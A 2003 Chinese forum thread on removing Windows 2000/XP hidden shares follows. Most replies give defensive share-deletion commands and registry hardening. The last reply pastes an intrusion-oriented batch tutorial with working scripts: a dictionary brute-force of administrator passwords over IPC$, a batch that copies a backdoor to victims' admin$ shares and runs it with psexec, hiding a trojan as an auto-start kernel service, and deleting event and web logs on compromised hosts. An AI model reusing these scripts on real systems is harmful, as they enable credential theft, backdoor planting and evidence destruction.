怎么删除WIN2K PRO,SERVER 及XP 的隐藏共享??

gohomesina 2003-10-15 07:54:13
怎么删除WIN2K PRO,SERVER 及XP 的隐藏共享??
...全文
71 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
Aven_fudan 2003-10-16
  • 打赏
  • 举报
 回复
net share c$ /DELETE
net share d$ /DELETE
net share e$ /DELETE



保存成批处理,每次启动让他自动执行一次就OK了
gp1234567890 2003-10-16
  • 打赏
  • 举报
 回复
楼顶的太缺德了,大家都把方案说的明明白白的、正正确确的,全没分啊!
KK4 2003-10-16
  • 打赏
  • 举报
 回复
GpEidt
Qlike 2003-10-16
  • 打赏
  • 举报
 回复
修改注册表虽然可以解决问题,但是如果万一要用到呢,又要去改注册表吗??忘记了怎么办呢???那样太麻烦了。还是用记事本:
net share c$ /DELETE (删除默认共享的C 盘)
net share d$ /DELETE (删除默认共享的D 盘)
net share e$ /DELETE (删除默认共享的E 盘)



这样保存为一个批处理文件,放到启动项中,重起机器就可以看到所有的共享被删除了,如果不想删除哪个就不写对应的哪项,很灵活的。
sungod8 2003-10-16
  • 打赏
  • 举报
 回复
这个键值能够增强安全性,限制匿名访问!
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000001
sungod8 2003-10-16
  • 打赏
  • 举报
 回复
建一文本文档,内容如下,然后该名为1.reg之类,接着双击它就行了!
前面是FOR 2000 SERVER ,后面是 FOR 2000 PRO
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareserver"=dword:00000000


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoSharewks"=dword:00000000
大漠孤沙 2003-10-16
  • 打赏
  • 举报
 回复
这个最有效:

  2. 通过修改注册表来禁止管理共享 C$D$等 

  打开注册表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \Services\LanmanServer\Parameters项

  对于服务器,添加键值“AutoShareServer”,类型为“REG_DWORD”,值为“0”。

  对于客户机,添加键值“AutoShareWks”,类型为“REG_DWORD”,值为“0”。
skyyjl 2003-10-15
  • 打赏
  • 举报
 回复
停止win2k的各个磁盘的缺省的隐藏共享的4种方法
1、停止win2k的各个磁盘的缺省的隐藏共享?
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\lanmanserver\parameters]

下添加
autoshareserver=0

2、WIN2K的默认安装允许任何用户通过空用户得到系统所有账号和共享列表,这本来是为了方便局域网用户共享资源和文件的,但是,同时任何一个远程用户也可以通过同样的方法得到你的用户列表,并可能使用暴力法破解用户密码给整个网络带来破坏。很多人都只知道更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1来禁止空用户连接,实际上WIN2K的本地安全策略里(如果是域服务器就是在域服务器安全和域安全策略里)就有这样的选项RestrictAnonymous(匿名连接的额外限制),其中有三个值:
  “0”:None, Rely on default permissions(无,取决于默认的权限)
  “1”:Do not allow enumeration of SAM accounts and shares(不允许枚举SAM账号和共享)
  “2”:No access without explicit anonymous permissions(没有显式匿名权限就不允许访问)
  “0”这个值是系统默认的,没有任何限制,远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum)等,对服务器来说这样的设置非常危险。“1”这个值是只允许非NULL用户存取SAM账号信息和共享信息。“2”这个值只有WIN2K才支持,需要注意的是,如果使用了这个值,就不能再共享资源了,所以还是推荐把数值设为“1”比较好。


3、关闭默认共享。这里必须要修改注册表,否则每次重启之后默认共享还会出现。在注册表“HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run”下,在右栏空白位置点击鼠标右键,选择“新建”,再选“字符串值”,名称中输入:“delipc$”,这里的名字可以随便取,然后双击它就会弹出一个窗口来,输入:“net share ipc$/del”,下次开机就可自动删掉默认共享。修改注册表后需要重新启动机器。同样的方法还可以删掉AMDIN$等等。

4、同样可以用批处理来实现
在C:\Documents and Settings\Administrator\「开始」菜单\程序\启动(这里用的是Administrator用户)里新建个文件del.bat(文件名随意取的)
del.bat的内容:
net share ipc$ /delete
net share Admin$ /delete
net share c$ /delete
这样在每次开机的时候就会自动运行del.bat,系统就会去掉ipc$等系统隐含的共享
52net 2003-10-15
  • 打赏
  • 举报
 回复
只要将以下语句写入AUTOEXEC.BAT中即可
net share c$ /DELETE (删除默认共享的C 盘)
net share d$ /DELETE (删除默认共享的D 盘)
net share e$ /DELETE (删除默认共享的E 盘)
。。。 。。。
muake 2003-10-15
  • 打赏
  • 举报
 回复
http://soft.shangdu.com/cywl/new/2003-3-26/200332691110.htm

Windows 2000 用户须注意防范IPC$ 共享漏洞
来源:IT网络学院 2003年3月26日9:11

IPC$漏洞描述

  用过Windows 2000的人都知道,Windows 2000的默认安装允许任何用户通过空用户连接(IPC$)得到系统所有账号和共享列表,这本来是为了方便局域网用户共享资源和文件的,但是任何一个远程用户都可以利用这个空的连接得到你的用户列表。一些别有用心者会利用这项功能,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻击。另外,在安装系统时创建一些隐藏的共享,通过“计算机名或IP地址\盘符$”就可以访问。作为系统管理员的我,平时也喜欢利用这些共享来进行远程管理计算机和查看计算机的共享资源时,没想到却给黑客留了通道。

  黑客攻击

“流光”主界面

  一些别有用心者曾经利用黑客工具软件对我所管理的服务器进行IPC$漏洞探测,其中以“流光”软件最为出名,其运行主界面如图1所示,按[Ctrl+R]键弹出扫描框。在扫描范围栏里输入你要扫描的IP地址范围,在扫描主机类型里选择Windows NT/98,确定后进行扫描,这样,一些在线的Windows NT/98机器就会被扫描出来。

扫描对话框

  鼠标右击界面上“IPC$主机”,选择“探测”下面的“探测所有IPC$用户列表”命令,就会探测出给出IP地址范围的机器里的IPC$用户列表,关键是这里也可以扫描出这些用户列表中没有密码或是简单密码的用户。当然,得到用户列表后也可以选用专门的黑客字典试探出密码来,谁能保证,服务器里每个用户的密码都很强壮呢?所以这些人总有得逞的时候。  

  
  有了用户名和密码,在IE浏览器的地址栏输入“\\IP地址”,就会弹出一个对话框要求输入用户名和密码,将得到的用户名和密码输入之后就可轻松进入目标机器,不过这里看到的仅是目标机器主动共享出来的文件夹。如果在地址栏输入“\\IP地址\C$(或是D$,E$等)”,则可以看到目标机器C盘(或是D$,E$等)的全部内容。

  防范IPC$漏洞攻击

  知道黑客利用此漏洞入侵后,我惊出了一身冷汗,赶紧把密码设置得复杂一些,但是无论我采用多复杂的密码,过一段时间还是发现有被入侵的迹象。看来万事都不能两全,计算机管理也一样,要方便就不安全,要安全就不方便,所以我只好采用下面的方法把IPC$漏洞堵住,这样自己也就没办法享受默认共享带来的方便了。

  1. 通过修改注册表来禁止建立空连接(IPC$)

  点击[开始]→[运行],在运行框里输入“Regedit”回车后打开注册表,将HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA的RestrictAnonymous 项设置为“1”,就可以禁止空用户连接。

  2. 通过修改注册表来禁止管理共享 C$D$等 

  打开注册表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \Services\LanmanServer\Parameters项

  对于服务器,添加键值“AutoShareServer”,类型为“REG_DWORD”,值为“0”。

  对于客户机,添加键值“AutoShareWks”,类型为“REG_DWORD”,值为“0”。

  3. 批处理删除共享

  更简单的方法就是到 http://www.heibai.net/download/show.php?id=2194 ;下载Delshare.zip。该压缩包里包含两个自动永久删除 Windows 2000所有默认共享的两个批处理文件(一个中文版,一个英文版),也就是采用批处理方式一一删除所有共享,解压后执行其中一个即可达到目的。
treesman 2003-10-15
  • 打赏
  • 举报
 回复
论坛的精华帖里就有,楼主可以去看看!
如何编写批处理文件批处理文件批处理文件
简明批处理教程22009年10月20日 星期二 下午 05:35 最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古语云:“授人以鱼,不如授人以渔。”因为网上好像并没有一个比较完整的教材,所以抽一点时间写了这片《简明批处理教程》给新手朋友们.也献给所有为实现网络的自由与共享而努力的朋友们. 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 一、简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label(label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [Drive:][Path] FileName [BatchParameters] [:label [arguments] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag(应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:dosdefrag goto end :mem mem goto end :end echo good bye 此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 9.If 命令 if 表示将判断是否符合规定的条件,从而决定执行不同的命令。有三种格式: 1、if "参数" == "字符串" 待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名 待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字 待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2 DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable for {%variable|%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command [command-parameters] 如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。 FOR /R [drive:]path] %variable IN (set) DO command [command- 检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command 或者,如果有 usebackq 选项: FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或 'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属性 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2: 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \ipipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \ipipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \ipipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:ok.txt ,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 代码雏形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \%1ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \%1 c:winntsystem32windrv32.exe @psexec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. 二、如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。 @echo off @net use \1%ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^. 三、如何使用组合命令(Compound Command) 1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 Sample: C:>dir z: & dir c:Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:Ex4rch 2002-05-14 23:51 2002-05-14 23:51 2002-05-14 23:51 14 sometips.gif 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; Sample: C:>dir z: && dir c:Ex4rch The system cannot find the path specified. C:>dir c:Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:Ex4rch 2002-05-14 23:55 2002-05-14 23:55 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单,如: dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :) 3.|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; Sample: C:Ex4rch>dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子: sample: @copy trojan.exe \%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt 四、管道命令的使用 1.| 命令 Usage:第一条命令 | 第二条命令 [| 第三条命令...] 将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。 sample: time /t>>D:IP.log netstat -n -p tcp|find ":3389">>D:IP.log start Explorer 看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。 2.>、>>输出重定向命令 将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。 sample1: echo hello world>c:hello.txt (stupid example?) sample2: 时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录: 运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 3.& 、<& & 将一个句柄的输出写入到另一个句柄的输入中。 >Sample.reg @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg @echo "Invader"="Ex4rch">>Sample.reg @echo "door"=5>>C:\WINNT\system32\door.exe>>Sample.reg @echo "Autodos"=dword:02>>Sample.reg samlpe2: 我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe) @start windrv32.exe @attrib +h +r windrv32.exe @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll @echo "windsnx "=- >>patch.dll @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe @regedit /s patch.dll @delete patch.dll @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动] @REM 这样不是更安全^_^. 六、精彩实例放送 1.删除win2k/xp系统默认共享的批处理 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo preparing to delete all the default shares.when ready pres any key. @pause @echo off :Rem check parameters if null show usage. if {%1}=={} goto :Usage :Rem code start. echo. echo ------------------------------------------------------ echo. echo Now deleting all the default shares. echo. net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop Server net start Server echo. echo All the shares have been deleteed echo. echo ------------------------------------------------------ echo. echo Now modify the registry to change the system default properties. echo. echo Now creating the registry file echo Windows Registry Editor Version 5.00> c:delshare.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.reg echo "AutoShareWks"=dword:00000000>> c:delshare.reg echo "AutoShareServer"=dword:00000000>> c:delshare.reg echo Nowing using the registry file to chang the system default properties. regedit /s c:delshare.reg echo Deleting the temprotarily files. del c:delshare.reg goto :END :Usage echo. echo ------------------------------------------------------ echo. echo ☆ A example for batch file ☆ echo ☆ [Use batch file to change the sysytem share properties.] ☆ echo. echo Author:Ex4rch echo Mail:Ex4rch@hotmail.com QQ:1672602 echo. echo Error:Not enough parameters echo. echo ☆ Please enter the share disk you wanna delete ☆ echo. echo For instance,to delete the default shares: echo delshare c d e ipc admin print echo. echo If the disklable is not as C: D: E: ,Please chang it youself. echo. echo example: echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into : echo delshare c d e x y z ipc admin print echo. echo *** you can delete nine shares once in a useing *** echo. echo ------------------------------------------------------ goto :EOF :END echo. echo ------------------------------------------------------ echo. echo OK,delshare.bat has deleted all the share you assigned. echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. echo echo. echo ------------------------------------------------------ echo. :EOF echo end of the batch file ------------------------ cut here then save as .bat or .cmd file --------------------------- .全面加固系统(给肉鸡打补丁)的批处理文件 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo Windows Registry Editor Version 5.00 >patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll @echo "AutoShareServer"=dword:00000000 >>patch.dll @echo "AutoShareWks"=dword:00000000 >>patch.dll @REM [禁止共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll @echo "restrictanonymous"=dword:00000001 >>patch.dll @REM [禁止匿名登录] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll @REM [禁止及文件访问和打印共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll @echo "ShutdownWithoutLogon"="0" >>patch.dll @REM [禁止登录前关机] @echo "DontDisplayLastUserName"="1" >>patch.dll @REM [禁止显示前一个登录用户名称] @regedit /s patch.dll ------------------------ cut here then save as .bat or .cmd file --------------------------- 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 @regedit /s patch.dll @net stop w3svc @net stop event log @del c:winntsystem32logfilesw3svc1*.* /f /q @del c:winntsystem32logfilesw3svc2*.* /f /q @del c:winntsystem32config*.event /f /q @del c:winntsystem32dtclog*.* /f /q @del c:winnt*.txt /f /q @del c:winnt*.log /f /q @net start w3svc @net start event log @rem [删除日志] @net stop lanmanserver /y @net stop Schedule /y @net stop RemoteRegistry /y @del patch.dll @echo The server has been patched,Have fun. @del patch.bat @REM [禁止一些危险的服务。] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll @echo "PortNumber"=dword:00002010 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp 